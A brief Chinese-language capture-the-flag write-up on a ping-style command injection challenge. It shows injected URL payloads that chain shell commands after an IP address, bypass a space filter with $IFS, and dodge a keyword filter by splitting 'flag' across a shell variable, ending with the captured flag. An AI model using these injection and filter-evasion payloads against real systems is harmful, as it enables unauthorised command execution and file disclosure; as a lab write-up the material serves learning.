首先打开,然后后面跟着
/?ip=127.0.0.1|ls
找目录
我们看到flag.php与index.php两个php文件。我们接着找flag.php
看到提示空格被禁用绕过空格的方法大概有以下几种:
$IFS$(任意数字) cat${IFS}$1flag,尝试
发现flag也被骚扰了,然后打开index.php,看看内容
发现被过滤了好多,然后发现有个变量a,尝试替换拼接flag中的g
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
flag{61584ea2-f679-45f5-b8c1-32bd1a13a0f5}